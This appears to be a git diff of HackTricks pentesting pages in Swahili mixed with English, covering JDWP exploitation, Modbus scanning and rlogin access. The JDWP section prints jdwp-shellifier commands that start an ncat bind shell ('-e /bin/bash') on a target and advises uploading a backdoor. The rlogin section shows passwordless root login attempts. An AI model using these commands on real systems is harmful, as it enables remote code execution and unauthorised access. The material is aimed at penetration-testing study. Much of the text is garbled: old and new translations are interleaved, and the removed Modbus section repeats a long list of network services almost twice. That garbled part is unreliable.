Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Kudukua
## Exploiting
Udanganyifu wa JDWP unategemea **ukosefu wa uwakilishi na kusimbwa kwa itifaki**. Kawaida inapatikana kwenye **bandari 8000**, lakini bandari nyingine ni sawa. Uunganisho wa awali unafanywa kwa kutuma "JDWP-Handshake" kwenye bandari ya lengo. Ikiwa huduma ya JDWP iko hai, itajibu na herufi sawa, ikithibitisha uwepo wake. Hatua hii ya mwanzo inafanya kazi kama njia ya kutambua huduma za JDWP kwenye mtandao.
JDWP exploitation inategemea **ukosefu wa uthibitisho na usimbuaji** wa protokali. Kwa kawaida hupatikana kwenye **bandari 8000**, lakini bandari nyingine zinaweza kuwa. Muunganisho wa awali unafanywa kwa kutuma "JDWP-Handshake" kwenye bandari lengwa. Ikiwa huduma ya JDWP inafanya kazi, inajibu kwa kutumia string ile ile, ikithibitisha uwepo wake. Hii handshake inafanya kazi kama njia ya kutambua huduma za JDWP kwenye mtandao.
Kuhusu utambuzi wa mchakato, kutafuta herufi "jdwk" kwenye michakato ya Java inaweza kuashiria kikao cha JDWP kilichopo.
Kwa upande wa utambuzi wa mchakato, kutafuta string "jdwk" katika michakato ya Java kunaweza kuashiria kikao cha JDWP kinachofanya kazi.
Zana inayotumiwa ni [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Unaweza kuitumia na vigezo tofauti:
Chombo kinachotumika ni [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Unaweza kukitumia na vigezo tofauti:
```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
Nimegundua kuwa matumizi ya `--break-on 'java.lang.String.indexOf'` yanafanya shambulizi kuwa **thabiti** zaidi. Na ikiwa una nafasi ya kupakia mlango wa nyuma kwenye mwenyeji na kuutekeleza badala ya kutekeleza amri, shambulizi litakuwa thabiti zaidi.
I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
## Maelezo zaidi
## More details
**Hii ni muhtasari wa [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Angalia kwa maelezo zaidi.
1. **JDWP Maelezo**:
- Ni itifaki ya mtandao ya pakiti, hasa ya kusawazisha.
- Haina uthibitishaji na kificho, ikifanya kuwa hatarishi wakati inapofichuliwa kwenye mtandao wenye nia mbaya.
1. **JDWP Overview**:
- Ni protokali ya mtandao ya binary inayotumia pakiti, hasa synchronous.
- Haina uthibitisho na usimbuaji, hivyo inakuwa hatarini inapokuwa wazi kwa mitandao ya adui.
2. **JDWP Handshake**:
- Mchakato rahisi wa kupeana mikono hutumiwa kuanzisha mawasiliano. Kamba ya ASCII yenye herufi 14 "JDWP-Handshake" inabadilishwa kati ya Debugger (mteja) na Debuggee (seva).
- Mchakato rahisi wa handshake unatumika kuanzisha mawasiliano. Mstari wa ASCII wenye herufi 14 “JDWP-Handshake” unabadilishana kati ya Debugger (mteja) na Debuggee (server).
3. **Mawasiliano ya JDWP**:
- Ujumbe una muundo rahisi na sehemu kama Urefu, Kitambulisho, Bendera, na Seti ya Amri.
- Thamani za Seti ya Amri zinaanzia 0x40 hadi 0x80, zikionyesha hatua na matukio tofauti.
3. **JDWP Communication**:
- Ujumbe una muundo rahisi wenye maeneo kama Length, Id, Flag, na CommandSet.
- Thamani za CommandSet zinaanzia 0x40 hadi 0x80, zik representing hatua na matukio tofauti.
4. **Udanganyifu**:
- JDWP inaruhusu kupakia na kuita darasa na kanuni ya kiholela, ikileta hatari za usalama.
- Makala inaelezea mchakato wa udanganyifu katika hatua tano, ikihusisha kupata marejeleo ya Java Runtime, kuweka alama za kusitisha, na kuita njia.
4. **Exploitation**:
- JDWP inaruhusu kupakia na kuita madarasa na bytecode zisizo na mipaka, ikileta hatari za usalama.
- Makala inaelezea mchakato wa unyakuzi katika hatua tano, ikihusisha kupata marejeleo ya Java Runtime, kuweka breakpoints, na kuita mbinu.
5. **Udanganyifu katika Maisha Halisi**:
- Licha ya ulinzi wa firewall, huduma za JDWP zinaweza kupatikana na kudanganywa katika mazingira halisi, kama inavyothibitishwa na utafutaji kwenye majukwaa kama ShodanHQ na GitHub.
- Kigezo cha udanganyifu kilijaribiwa dhidi ya toleo mbalimbali za JDK na ni huru ya jukwaa, ikitoa Utekelezaji wa Kanuni kwa Mbali (RCE) unaoweza kutegemewa.
5. **Real-Life Exploitation**:
- Licha ya uwezekano wa ulinzi wa firewall, huduma za JDWP zinaweza kupatikana na kutumika katika hali halisi, kama inavyoonyeshwa na utafutaji kwenye majukwaa kama ShodanHQ na GitHub.
- Skripti ya unyakuzi ilijaribiwa dhidi ya toleo mbalimbali za JDK na ni huru ya jukwaa, ikitoa Utekelezaji wa Msimbo wa K remote (RCE) wa kuaminika.
6. **Athari za Usalama**:
- Kuwepo kwa huduma za JDWP zilizofunguliwa kwenye mtandao kunasisitiza umuhimu wa ukaguzi wa usalama mara kwa mara, kuzima utendaji wa kurekebisha katika uzalishaji, na mipangilio sahihi ya firewall.
6. **Security Implications**:
- Uwepo wa huduma za JDWP zilizo wazi kwenye mtandao unaonyesha umuhimu wa ukaguzi wa usalama wa mara kwa mara, kuzima kazi za debug katika uzalishaji, na usanidi sahihi wa firewall.
### **Marejeo:**
### **References:**
* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)]
* [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
@ -69,16 +72,17 @@ Nimegundua kuwa matumizi ya `--break-on 'java.lang.String.indexOf'` yanafanya sh
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

160
network-services-pentesting/pentesting-modbus.md
View file

@ -1,161 +1,45 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
Mwaka 1979, **Itifaki ya Modbus** ilibuniwa na Modicon, ikitumika kama muundo wa ujumbe. Matumizi yake kuu ni kurahisisha mawasiliano kati ya vifaa vya akili, vikiendesha chini ya mfano wa bwana-mtumwa/mteja-seva. Itifaki hii inacheza jukumu muhimu katika kuruhusu vifaa kubadilishana data kwa ufanisi.
Mnamo mwaka wa 1979, **Modbus Protocol** ilitengenezwa na Modicon, ikihudumu kama muundo wa ujumbe. Matumizi yake makuu yanahusisha kuwezesha mawasiliano kati ya vifaa vyenye akili, vinavyofanya kazi chini ya mfano wa bwana-mtumwa/klienti-server. Protokali hii ina jukumu muhimu katika kuwezesha vifaa kubadilishana data kwa ufanisi.
**Bandari ya chaguo-msingi:** 502
**Default port:** 502
```
PORT STATE SERVICE
502/tcp open modbus
```
# Uchunguzi
## Modbus
Modbus ni itifaki ya mawasiliano ya viwandani ambayo hutumiwa sana katika mifumo ya kudhibiti na kusimamia vifaa vya viwandani. Itifaki hii inaruhusu vifaa vya kudhibiti kubadilishana habari na vifaa vingine kwa njia ya mtandao.
### Kugundua Huduma ya Modbus
Kabla ya kuanza kuchunguza huduma ya Modbus, tunahitaji kujua anwani ya IP ya kifaa tunachotaka kuchunguza. Kwa kufanya hivyo, tunaweza kutumia zana kama `nmap` au `netdiscover`.
Baada ya kupata anwani ya IP, tunaweza kutumia zana kama `modscan` au `modbus-cli` kugundua huduma ya Modbus na kuchunguza vifaa vilivyounganishwa.
### Kuchunguza Vifaa vya Modbus
Baada ya kugundua huduma ya Modbus, tunaweza kuanza kuchunguza vifaa vilivyounganishwa. Kuna njia kadhaa za kufanya hivyo:
1. **Kuchunguza Namba za Kitambulisho cha Kifaa (Unit ID)**: Kwa kutumia zana kama `modscan` au `modbus-cli`, tunaweza kuchunguza namba za kitambulisho cha kifaa na kujua ni vifaa gani vinavyopatikana kwenye mtandao.
2. **Kuchunguza Namba za Usajili (Register Addresses)**: Kwa kutumia zana kama `modscan` au `modbus-cli`, tunaweza kuchunguza namba za usajili na kujua habari gani inapatikana kwenye kila usajili.
3. **Kuchunguza Operesheni za Kusoma na Kuandika**: Kwa kutumia zana kama `modscan` au `modbus-cli`, tunaweza kuchunguza operesheni za kusoma na kuandika na kujua ni aina gani za habari tunaweza kupata au kubadilisha kwenye vifaa vya Modbus.
### Kuchunguza Udhaifu wa Modbus
Baada ya kuchunguza vifaa vya Modbus, tunaweza kuanza kutafuta udhaifu ambao tunaweza kuchexploit. Hapa kuna baadhi ya udhaifu maarufu wa Modbus:
1. **Udhaifu wa Usalama wa Kitambulisho cha Kifaa**: Baadhi ya vifaa vya Modbus hutumia namba za kitambulisho cha kifaa ambazo ni rahisi kutambulika. Hii inaweza kusababisha shambulio la kuchanganya habari au kubadilisha data kwenye vifaa vya Modbus.
2. **Udhaifu wa Usalama wa Usajili**: Baadhi ya vifaa vya Modbus hutumia namba za usajili ambazo hazijalindwa vizuri. Hii inaweza kusababisha shambulio la kubadilisha data au kusoma habari nyeti kutoka kwenye vifaa vya Modbus.
3. **Udhaifu wa Usalama wa Operesheni**: Baadhi ya vifaa vya Modbus hutumia operesheni za kusoma na kuandika ambazo hazijalindwa vizuri. Hii inaweza kusababisha shambulio la kubadilisha data au kusoma habari nyeti kutoka kwenye vifaa vya Modbus.
### Kuchunguza Huduma Zingine
Mbali na Modbus, kuna huduma zingine ambazo zinaweza kuwa zinatumika kwenye kifaa. Baadhi ya huduma hizi ni pamoja na:
- **HTTP**: Huduma ya wavuti inayotumiwa kwa kudhibiti na kusimamia kifaa.
- **SSH**: Huduma ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **Telnet**: Huduma ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **FTP**: Huduma ya uhamishaji wa faili ambayo inaruhusu uhamishaji wa faili kati ya kifaa na seva.
- **SNMP**: Huduma ya usimamizi wa mtandao ambayo inaruhusu ufuatiliaji na udhibiti wa vifaa vya mtandao.
- **SMTP**: Huduma ya barua pepe ambayo inaruhusu kutuma na kupokea barua pepe.
- **DNS**: Huduma ya jina la kikoa ambayo inaruhusu kutafsiri majina ya kikoa kuwa anwani za IP.
- **NTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **SNTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **RDP**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **VNC**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **SMB**: Huduma ya kushirikiana faili ambayo inaruhusu kushiriki faili kati ya vifaa vya mtandao.
- **RPC**: Huduma ya itifaki ya mbali ambayo inaruhusu kufanya wito wa mbali kwenye kifaa.
- **ICMP**: Huduma ya itifaki ya udhibiti wa ujumbe ambayo inaruhusu ujumbe wa udhibiti na taarifa kati ya vifaa vya mtandao.
- **ARP**: Huduma ya itifaki ya azimio la anwani ambayo inaruhusu kutafuta anwani za MAC kwa anwani za IP.
- **DHCP**: Huduma ya itifaki ya usambazaji wa anwani ya IP ambayo inaruhusu kugawa anwani za IP kwa vifaa vya mtandao.
- **DNS**: Huduma ya itifaki ya jina la kikoa ambayo inaruhusu kutafsiri majina ya kikoa kuwa anwani za IP.
- **LDAP**: Huduma ya itifaki ya miongozo ya upatikanaji wa saraka ambayo inaruhusu upatikanaji wa habari ya saraka kwenye mtandao.
- **RADIUS**: Huduma ya itifaki ya udhibiti wa ufikiaji wa mtandao ambayo inaruhusu udhibiti wa ufikiaji kwenye mtandao.
- **TFTP**: Huduma ya itifaki ya uhamishaji wa faili ndogo ambayo inaruhusu uhamishaji wa faili ndogo kati ya kifaa na seva.
- **SNMP**: Huduma ya itifaki ya usimamizi wa mtandao ambayo inaruhusu ufuatiliaji na udhibiti wa vifaa vya mtandao.
- **SMTP**: Huduma ya itifaki ya barua pepe ambayo inaruhusu kutuma na kupokea barua pepe.
- **POP3**: Huduma ya itifaki ya barua pepe ambayo inaruhusu kupokea barua pepe.
- **IMAP**: Huduma ya itifaki ya barua pepe ambayo inaruhusu kupokea na kusimamia barua pepe.
- **FTP**: Huduma ya itifaki ya uhamishaji wa faili ambayo inaruhusu uhamishaji wa faili kati ya kifaa na seva.
- **SSH**: Huduma ya itifaki ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **Telnet**: Huduma ya itifaki ya kuingia kwa mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **HTTP**: Huduma ya itifaki ya wavuti ambayo inaruhusu kudhibiti na kusimamia kifaa.
- **HTTPS**: Huduma ya itifaki ya wavuti salama ambayo inaruhusu kudhibiti na kusimamia kifaa kwa njia salama.
- **DNS**: Huduma ya itifaki ya jina la kikoa ambayo inaruhusu kutafsiri majina ya kikoa kuwa anwani za IP.
- **NTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **SNTP**: Huduma ya itifaki ya wakati ambayo inaruhusu kusawazisha saa kwenye vifaa vya mtandao.
- **RDP**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **VNC**: Huduma ya itifaki ya mbali ambayo inaruhusu ufikiaji wa kijijini kwenye kifaa.
- **SMB**: Huduma ya itifaki ya kushirikiana faili ambayo inaruhusu kushiriki faili kati ya vifaa vya mtandao.
- **RPC**: Huduma ya itifaki ya mbali ambayo inaruhusu kufanya wito wa mbali kwenye kifaa.
- **ICMP**: Huduma ya itifaki ya udhibiti wa ujumbe ambayo inaruhusu ujumbe wa udhibiti na taarifa kati ya vifaa vya mtandao.
- **ARP**: Huduma ya itifaki ya azimio la anwani ambayo inaruhusu kutafuta anwani za MAC kwa anwani za IP.
- **DHCP**: Huduma ya itifaki ya usambazaji wa anwani ya IP ambayo inaruhusu kugawa anwani za IP kwa vifaa vya mtandao.
- **LDAP**: Huduma ya itifaki ya miongozo ya upatikanaji wa saraka ambayo inaruhusu upatikanaji wa habari ya saraka kwenye mtandao.
- **RADIUS**: Huduma ya itifaki ya udhibiti wa ufikiaji wa mtandao ambayo inaruhusu udhibiti wa ufikiaji kwenye mtandao.
- **TFTP**: Huduma ya itifaki ya uhamishaji wa faili ndogo ambayo inaruhusu uhamishaji wa faili ndogo kati ya kifaa na seva.
# Uhesabuzi
```bash
nmap --script modbus-discover -p 502 <IP>
msf> use auxiliary/scanner/scada/modbusdetect
msf> use auxiliary/scanner/scada/modbus_findunitid
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

46
network-services-pentesting/pentesting-rlogin.md
View file

@ -1,29 +1,30 @@
# 513 - Kupima Usalama wa Rlogin
# 513 - Pentesting Rlogin
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## Taarifa Msingi
## Basic Information
Awali, **rlogin** ilikuwa ikitumiwa sana kwa kazi za utawala wa mbali. Hata hivyo, kutokana na wasiwasi kuhusu usalama wake, kwa kiasi kikubwa imepita na **slogin** na **ssh**. Mbinu hizi mpya hutoa usalama bora kwa mawasiliano ya mbali.
Katika siku za nyuma, **rlogin** ilitumika sana kwa kazi za usimamizi wa mbali. Hata hivyo, kutokana na wasiwasi kuhusu usalama wake, imekuwa ikifutwa kwa kiasi kikubwa na **slogin** na **ssh**. Njia hizi mpya zinatoa usalama ulioimarishwa kwa ajili ya muunganisho wa mbali.
**Bandari ya chaguo:** 513
**Default port:** 513
```
PORT STATE SERVICE
513/tcp open login
@ -33,11 +34,11 @@ PORT STATE SERVICE
# Install client
apt-get install rsh-client
```
Unaweza kutumia amri ifuatayo kujaribu **kuingia** kwenye mwenyeji wa mbali ambapo **haihitajiki nenosiri** kwa ufikiaji. Jaribu kutumia **root** kama jina la mtumiaji:
Unaweza kutumia amri ifuatayo kujaribu **kuingia** kwenye mwenyeji wa mbali ambapo **hakuna nenosiri** linalohitajika kwa ufikiaji. Jaribu kutumia **root** kama jina la mtumiaji:
```bash
rlogin <IP> -l <username>
```
### [Kuvunja nguvu](../generic-methodologies-and-resources/brute-force.md#rlogin)
### [Brute force](../generic-methodologies-and-resources/brute-force.md#rlogin)
## Pata faili
```
@ -48,16 +49,17 @@ find / -name .rhosts
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
